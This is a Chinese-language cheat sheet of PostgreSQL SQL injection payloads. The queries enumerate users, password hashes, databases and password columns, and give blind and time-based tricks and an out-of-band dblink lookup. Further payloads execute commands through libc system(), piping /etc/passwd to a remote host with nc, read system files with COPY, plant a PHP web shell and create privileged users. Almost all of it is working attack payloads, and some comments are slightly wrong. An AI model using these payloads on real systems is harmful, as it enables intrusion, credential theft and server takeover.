Postgres SQL 注入速查表

SELECT version()

SELECT user;SELECT current_user;SELECT session_user;SELECT usename FROM pg_user;SELECT getpgusername();

SELECT usename FROM pg_user

SELECT usename, passwd FROM pg_shadow

SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user

SELECT usename FROM pg_user WHERE usesuper IS TRUE

SELECT current_database()

SELECT datname FROM pg_database

SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')

SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid)

SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public') AND attname LIKE '%password%';

SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0;SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;

SELECT substr('abcd', 3, 1); -返回c

SELECT 6 & 2; -返回2SELECT 6 & 1; -返回0

SELECT chr(65);

SELECT ascii('A');

SELECT CAST(1 as varchar);SELECT CAST('1' as int);

SELECT 'A' || 'B'; -返回AB

SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; -返回A

SELECT CHR(65)||CHR(66); -返回AB

SELECT pg_sleep(10); -postgres 8.2+以上CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(10); -自己创建延时

SELECT * FROM dblink('host=dnslog.com user=someuser  dbname=somedb', 'SELECT version()') RETURNS (result TEXT);

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT;SELECT system('cat /etc/passwd | nc 10.0.0.1 8080');

CREATE TABLE mydata(t text);COPY mydata FROM '/etc/passwd';' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1;' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2;

DROP TABLE mytest mytest;CREATE TABLE mytable (mycol text);INSERT INTO mytable(mycol) VALUES ('<? pasthru($_GET[cmd]); ?>');COPY mytable (mycol) TO '/tmp/test.php';

SELECT inet_server_addr(); - -返回数据库服务器 IP 地址（如果使用本地连接则返回 null）SELECT inet_server_port(); -返回数据库服务器 IP 地址（如果使用本地连接则返回 null）

CREATE USER test1 PASSWORD 'pass1';CREATE USER test1 PASSWORD 'pass1' CREATEUSER;

ALTER USER test1 CREATEUSER CREATEDB;

SELECT current_setting('data_directory');SELECT current_setting('hba_file');

template0template1